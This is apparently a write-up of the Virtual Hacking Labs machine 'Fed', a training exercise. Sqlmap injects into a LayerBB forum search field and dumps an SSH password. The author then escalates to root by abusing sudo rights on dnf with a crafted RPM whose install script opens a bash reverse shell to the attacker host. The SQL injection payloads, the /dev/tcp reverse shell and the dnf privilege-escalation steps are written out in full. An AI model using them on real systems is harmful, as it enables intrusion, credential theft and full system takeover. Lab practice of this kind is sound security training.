xsspresso
xsspresso
WriteupsVHL — Fed
WebMediumLinux

VHL — Fed

Custom PHP forum on Fedora Linux with MariaDB. SQL injection bypasses authentication, leading to file write and shell upload.

February 12, 2025Virtual Hacking Labs
#PHP#SQLi#MariaDB#File Write

nmap

sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.68
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-12 22:34 EST
Stats: 0:00:46 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 22:35 (0:00:12 remaining)
Stats: 0:01:29 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 22:36 (0:00:26 remaining)
Stats: 0:02:26 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 22:38 (0:00:45 remaining)
Stats: 0:02:44 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Nmap scan report for 10.11.1.68
Host is up (0.022s latency).
Not shown: 65530 closed tcp ports (reset), 1 filtered tcp port (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.8 (protocol 2.0)
| ssh-hostkey: 
|   256 eb:59:13:ff:ca:a5:19:b7:be:3d:53:b9:7e:05:79:57 (ECDSA)
|_  256 27:79:88:ab:06:f6:4d:c7:2b:65:a9:10:89:eb:a4:0a (ED25519)
80/tcp   open  http            Apache httpd 2.4.54 ((Fedora Linux))
| http-title: Fed Forum
|_Requested resource was forum.php
|_http-server-header: Apache/2.4.54 (Fedora Linux)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
3306/tcp open  mysql           MariaDB (unauthorized)
9090/tcp open  ssl/zeus-admin?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=bb8ca7e9...
| Subject Alternative Name: IP Address:127.0.0.1, DNS:localhost
| Not valid before: 2025-02-13T03:35:10
|_Not valid after:  2026-03-15T03:35:10
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 400 Bad request
|     Content-Type: text/html; charset=utf8
|     Transfer-Encoding: chunked
|     X-DNS-Prefetch-Control: off
|     Referrer-Policy: no-referrer
|     X-Content-Type-Options: nosniff
|     Cross-Origin-Resource-Policy: same-origin
|     X-Frame-Options: sameorigin
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <title>
|     request
|     </title>
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <style>
|     body {
|     margin: 0;
|     font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
|     font-size: 12px;
|     line-height: 1.66666667;
|     color: #333333;
|     background-color: #f5f5f5;
|     border: 0;
|     vertical-align: middle;
|_    font-weight: 300;
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9090-TCP:V=7.94SVN%T=SSL%I=7%D=2/12%Time=67AD68A4%P=x86_64-pc-linux
SF:-gnu%r(GetRequest,DB0,"HTTP/1\.1\x20400\x20Bad\x20request\r\nContent-Ty
SF:pe:\x20text/html;\x20charset=utf8\r\nTransfer-Encoding:\x20chunked\r\nX
SF:-DNS-Prefetch-Control:\x20off\r\nReferrer-Policy:\x20no-referrer\r\nX-C
SF:ontent-Type-Options:\x20nosniff\r\nCross-Origin-Resource-Policy:\x20sam
SF:e-origin\r\nX-Frame-Options:\x20sameorigin\r\n\r\n29\r\n<!DOCTYPE\x20ht
SF:ml>\n<html>\n<head>\n\x20\x20\x20\x20<title>\r\nb\r\nBad\x20request\r\n
SF:c2b\r\n</title>\n\x20\x20\x20\x20<meta\x20http-equiv=\"Content-Type\"\x
SF:20content=\"text/html;\x20charset=utf-8\">\n\x20\x20\x20\x20<meta\x20na
SF:me=\"viewport\"\x20content=\"width=device-width,\x20initial-scale=1\.0\
SF:">\n\x20\x20\x20\x20<style>\n\tbody\x20{\n\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20margin:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20font-family:\x20\"RedHatDisplay\",\x20\"Open\x20Sans\",\x20H
SF:elvetica,\x20Arial,\x20sans-serif;\n\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20font-size:\x2012px;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20line-height:\x201\.66666667;\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20color:\x20#333333;\n\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20background-color:\x20#f5f5f5;\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20}\n\x20\x20\x20\x20\x20\x20\x20\x20img\x20{\n\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20border:\x200;\n\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20vertical-align:\x20middle;\n\x20\x20\x20\x20\x20\x
SF:20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x20\x20h1\x20{\n\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20font-weight:\x20300;\n\x20\x20\x20\x20\x
SF:20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x20\x20p\x20")%r(HTTPOptions,
SF:DB0,"HTTP/1\.1\x20400\x20Bad\x20request\r\nContent-Type:\x20text/html;\
SF:x20charset=utf8\r\nTransfer-Encoding:\x20chunked\r\nX-DNS-Prefetch-Cont
SF:rol:\x20off\r\nReferrer-Policy:\x20no-referrer\r\nX-Content-Type-Option
SF:s:\x20nosniff\r\nCross-Origin-Resource-Policy:\x20same-origin\r\nX-Fram
SF:e-Options:\x20sameorigin\r\n\r\n29\r\n<!DOCTYPE\x20html>\n<html>\n<head
SF:>\n\x20\x20\x20\x20<title>\r\nb\r\nBad\x20request\r\nc2b\r\n</title>\n\
SF:x20\x20\x20\x20<meta\x20http-equiv=\"Content-Type\"\x20content=\"text/h
SF:tml;\x20charset=utf-8\">\n\x20\x20\x20\x20<meta\x20name=\"viewport\"\x2
SF:0content=\"width=device-width,\x20initial-scale=1\.0\">\n\x20\x20\x20\x
SF:20<style>\n\tbody\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0margin:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-fa
SF:mily:\x20\"RedHatDisplay\",\x20\"Open\x20Sans\",\x20Helvetica,\x20Arial
SF:,\x20sans-serif;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-
SF:size:\x2012px;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20line-he
SF:ight:\x201\.66666667;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:color:\x20#333333;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20bac
SF:kground-color:\x20#f5f5f5;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20
SF:\x20\x20\x20\x20\x20\x20img\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20border:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20vertical-align:\x20middle;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\
SF:x20\x20\x20\x20\x20\x20\x20h1\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20font-weight:\x20300;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\
SF:x20\x20\x20\x20\x20\x20\x20\x20p\x20");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/12%OT=22%CT=1%CU=43028%PV=Y%DS=2%DC=I%G=Y%TM=67AD
OS:6924%P=x86_64-pc-linux-gnu)SEQ(SP=FE%GCD=1%ISR=10F%TI=Z%II=I%TS=A)SEQ(SP
OS:=FF%GCD=1%ISR=10F%TI=Z%TS=A)SEQ(SP=FF%GCD=1%ISR=10F%TI=Z%II=I%TS=A)SEQ(S
OS:P=FF%GCD=2%ISR=10F%TI=Z%II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M
OS:5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE8
OS:8%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%
OS:CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40
OS:%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
 
Network Distance: 2 hops
 
TRACEROUTE
HOP RTT      ADDRESS
1   22.05 ms 10.11.1.68
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 195.89 seconds

80

sh
80/tcp   open  http            Apache httpd 2.4.54 ((Fedora Linux))
| http-title: Fed Forum
|_Requested resource was forum.php
|_http-server-header: Apache/2.4.54 (Fedora Linux)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set

sqli LayerBB 1.1.3

  • https://github.com/advisories/GHSA-rc84-w3xr-xww4

sqlmap

sh
sqlmap -r req.txt --batch
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.9#stable}
|_ -| . [.]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
 
[*] starting @ 22:45:42 /2025-02-12/
 
[22:45:42] [INFO] parsing HTTP request from 'req.txt'
[22:45:42] [WARNING] provided value for parameter 'time_from' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[22:45:42] [WARNING] provided value for parameter 'time_to' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[22:45:42] [INFO] testing connection to the target URL
[22:45:42] [INFO] checking if the target is protected by some kind of WAF/IPS
[22:45:42] [INFO] testing if the target URL content is stable
[22:45:42] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[22:45:42] [INFO] testing if POST parameter 'search_query' is dynamic
[22:45:43] [WARNING] POST parameter 'search_query' does not appear to be dynamic
[22:45:43] [INFO] heuristic (basic) test shows that POST parameter 'search_query' might be injectable (possible DBMS: 'MySQL')
[22:45:43] [INFO] testing for SQL injection on POST parameter 'search_query'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[22:45:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:45:43] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[22:45:44] [INFO] testing 'Generic inline queries'
[22:45:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[22:45:44] [WARNING] reflective value(s) found and filtering out
[22:45:46] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[22:45:48] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[22:45:48] [INFO] POST parameter 'search_query' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable 
[22:45:48] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[22:45:48] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[22:45:48] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[22:45:48] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[22:45:48] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[22:45:48] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[22:45:48] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[22:45:48] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[22:45:48] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[22:45:48] [INFO] POST parameter 'search_query' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable 
[22:45:48] [INFO] testing 'MySQL inline queries'
[22:45:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[22:45:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[22:45:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[22:45:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[22:45:48] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[22:45:48] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[22:45:48] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[22:45:59] [INFO] POST parameter 'search_query' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[22:45:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:45:59] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[22:45:59] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:45:59] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[22:45:59] [INFO] target URL appears to have 16 columns in query
[22:45:59] [INFO] POST parameter 'search_query' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[22:45:59] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
POST parameter 'search_query' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 153 HTTP(s) requests:
---
Parameter: search_query (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: search_query=test') OR NOT 8332=8332#&time_from=&time_to=&user_search=on&search_type=advanced&search_submit=Search
 
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: search_query=test') AND (SELECT 3479 FROM(SELECT COUNT(*),CONCAT(0x716a6b7a71,(SELECT (ELT(3479=3479,1))),0x716a786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- DccP&time_from=&time_to=&user_search=on&search_type=advanced&search_submit=Search
 
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search_query=test') AND (SELECT 1133 FROM (SELECT(SLEEP(5)))AGhM)-- NIbV&time_from=&time_to=&user_search=on&search_type=advanced&search_submit=Search
 
    Type: UNION query
    Title: MySQL UNION query (NULL) - 16 columns
    Payload: search_query=test') UNION ALL SELECT NULL,CONCAT(0x716a6b7a71,0x594b4f4e4949695269594173697a7661434c5245646554657a434e6e71536a5656495766624c7151,0x716a786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&time_from=&time_to=&user_search=on&search_type=advanced&search_submit=Search
---
[22:45:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora
web application technology: PHP 7.4.33, Apache 2.4.54
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[22:45:59] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.11.1.68'
sh
sqlmap -r req.txt --batch --dbs
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.9#stable}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
 
[*] starting @ 23:37:58 /2025-02-12/
 
[23:37:58] [INFO] parsing HTTP request from 'req.txt'
[23:37:58] [WARNING] provided value for parameter 'time_from' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[23:37:58] [WARNING] provided value for parameter 'time_to' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[23:37:58] [INFO] resuming back-end DBMS 'mysql' 
[23:37:58] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search_query (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: search_query=test') OR NOT 8332=8332#&time_from=&time_to=&user_search=on&search_type=advanced&search_submit=Search
 
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: search_query=test') AND (SELECT 3479 FROM(SELECT COUNT(*),CONCAT(0x716a6b7a71,(SELECT (ELT(3479=3479,1))),0x716a786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- DccP&time_from=&time_to=&user_search=on&search_type=advanced&search_submit=Search
 
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search_query=test') AND (SELECT 1133 FROM (SELECT(SLEEP(5)))AGhM)-- NIbV&time_from=&time_to=&user_search=on&search_type=advanced&search_submit=Search
 
    Type: UNION query
    Title: MySQL UNION query (NULL) - 16 columns
    Payload: search_query=test') UNION ALL SELECT NULL,CONCAT(0x716a6b7a71,0x594b4f4e4949695269594173697a7661434c5245646554657a434e6e71536a5656495766624c7151,0x716a786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&time_from=&time_to=&user_search=on&search_type=advanced&search_submit=Search
---
[23:37:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora
web application technology: Apache 2.4.54, PHP 7.4.33
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[23:37:58] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] layerbb
[*] mysql
[*] performance_schema
[*] ssh
sh
sqlmap -r req.txt --batch -D ssh --tables
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.9#stable}
|_ -| . [']     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
 
[*] starting @ 23:39:24 /2025-02-12/
 
[23:39:24] [INFO] parsing HTTP request from 'req.txt'
 
[23:39:24] [WARNING] provided value for parameter 'time_from' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[23:39:24] [WARNING] provided value for parameter 'time_to' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[23:39:24] [INFO] resuming back-end DBMS 'mysql' 
[23:39:24] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search_query (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: search_query=test') OR NOT 8332=8332#&time_from=&time_to=&user_search=on&search_type=advanced&search_submit=Search
 
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: search_query=test') AND (SELECT 3479 FROM(SELECT COUNT(*),CONCAT(0x716a6b7a71,(SELECT (ELT(3479=3479,1))),0x716a786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- DccP&time_from=&time_to=&user_search=on&search_type=advanced&search_submit=Search
 
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search_query=test') AND (SELECT 1133 FROM (SELECT(SLEEP(5)))AGhM)-- NIbV&time_from=&time_to=&user_search=on&search_type=advanced&search_submit=Search
 
    Type: UNION query
    Title: MySQL UNION query (NULL) - 16 columns
    Payload: search_query=test') UNION ALL SELECT NULL,CONCAT(0x716a6b7a71,0x594b4f4e4949695269594173697a7661434c5245646554657a434e6e71536a5656495766624c7151,0x716a786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&time_from=&time_to=&user_search=on&search_type=advanced&search_submit=Search
---
[23:39:24] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora
web application technology: Apache 2.4.54, PHP 7.4.33
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[23:39:24] [INFO] fetching tables for database: 'ssh'
Database: ssh
[1 table]
+-----------+
| ssh_users |
+-----------+
sh
sqlmap -r req.txt --batch -D ssh -T ssh_users --dump
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.9#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
 
[*] starting @ 23:39:45 /2025-02-12/
 
[23:39:45] [INFO] parsing HTTP request from 'req.txt'
[23:39:45] [WARNING] provided value for parameter 'time_from' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[23:39:45] [WARNING] provided value for parameter 'time_to' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[23:39:45] [INFO] resuming back-end DBMS 'mysql' 
[23:39:45] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search_query (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: search_query=test') OR NOT 8332=8332#&time_from=&time_to=&user_search=on&search_type=advanced&search_submit=Search
 
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: search_query=test') AND (SELECT 3479 FROM(SELECT COUNT(*),CONCAT(0x716a6b7a71,(SELECT (ELT(3479=3479,1))),0x716a786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- DccP&time_from=&time_to=&user_search=on&search_type=advanced&search_submit=Search
 
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search_query=test') AND (SELECT 1133 FROM (SELECT(SLEEP(5)))AGhM)-- NIbV&time_from=&time_to=&user_search=on&search_type=advanced&search_submit=Search
 
    Type: UNION query
    Title: MySQL UNION query (NULL) - 16 columns
    Payload: search_query=test') UNION ALL SELECT NULL,CONCAT(0x716a6b7a71,0x594b4f4e4949695269594173697a7661434c5245646554657a434e6e71536a5656495766624c7151,0x716a786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&time_from=&time_to=&user_search=on&search_type=advanced&search_submit=Search
---
[23:39:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora
web application technology: Apache 2.4.54, PHP 7.4.33
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[23:39:46] [INFO] fetching columns for table 'ssh_users' in database 'ssh'
[23:39:46] [INFO] fetching entries for table 'ssh_users' in database 'ssh'
Database: ssh
Table: ssh_users
[1 entry]
+----+-------------------+----------+
| ID | password          | username |
+----+-------------------+----------+
| 1  | FEder1K01!@ssw0rd | Federik  |
+----+-------------------+----------+

creds

federik:FEder1K01!@ssw0rd

ssh as federik

sh
ssh federik@10.11.1.68
federik@10.11.1.68's password: 
[federik@localhost ~]$ whoami
federik

priv esc

sudo (dnf)

sh
[federik@localhost ~]$ sudo -l
Matching Defaults entries for federik on localhost:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
    LS_COLORS", env_keep+="MAIL QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/var/lib/snapd/snap/bin
 
User federik may run the following commands on localhost:
    (root) NOPASSWD: /usr/bin/dnf
sh
[federik@localhost ~]$ vim root.sh

root.sh

sh
#!/bin/bash
bash -c 'bash -i >& /dev/tcp/172.16.1.1/1235 0>&1'
sh
[federik@localhost ~]$ fpm -n x -s dir -t rpm -a all --before-install root.sh ./
Created package {:path=>"x-1.0-1.noarch.rpm"}
[federik@localhost ~]$ ls
root.sh  x-1.0-1.noarch.rpm

--setopt=reposdir=/dev/null to avoid repo checks

sh
sudo dnf install -y ./x-1.0-1.noarch.rpm --setopt=reposdir=/dev/null
sh
[federik@localhost ~]$ sudo dnf install -y ./x-1.0-1.noarch.rpm --setopt=reposdir=/dev/null
Dependencies resolved.
===================================================================================================================================================
 Package                       Architecture                       Version                           Repository                                Size
===================================================================================================================================================
Installing:
 x                             noarch                             1.0-1                             @commandline                             7.6 k
 
Transaction Summary
===================================================================================================================================================
Install  1 Package
 
Total size: 7.6 k
Installed size: 1.5 k
Downloading Packages:
Running transaction check
Transaction check succeeded.
Running transaction test
Transaction test succeeded.
Running transaction
  Preparing        :                                                                                                                           1/1 
  Running scriptlet: x-1.0-1.noarch
sh
nc -lnvp 1235 
listening on [any] 1235 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.68] 36854
[root@localhost /]# whoammi
whoammi
bash: whoammi: command not found
[root@localhost /]# whoami
whoami
root
[root@localhost /]# cat /root/key.txt
cat /root/key.txt
b3g7bnca98utgbk2dy9c
[root@localhost /]# date
date
Thu Feb 13 06:24:30 AM CET 2025

Up next

MediumFeb 2025

VHL — Mantis

MantisBT bug tracker with Samba shares on Ubuntu. Enumeration of SMB reveals credentials reused for MantisBT admin access.

Read writeup
EasyFeb 2025

VHL — Natural

FTP anonymous login exposes web application files. Abused file write via FTP to upload a PHP webshell for initial access.

Read writeup
EasyFeb 2025

VHL — Trails

Hiking Trails web application on Ubuntu. Directory traversal and file inclusion vulnerabilities lead to credentials and shell.

Read writeup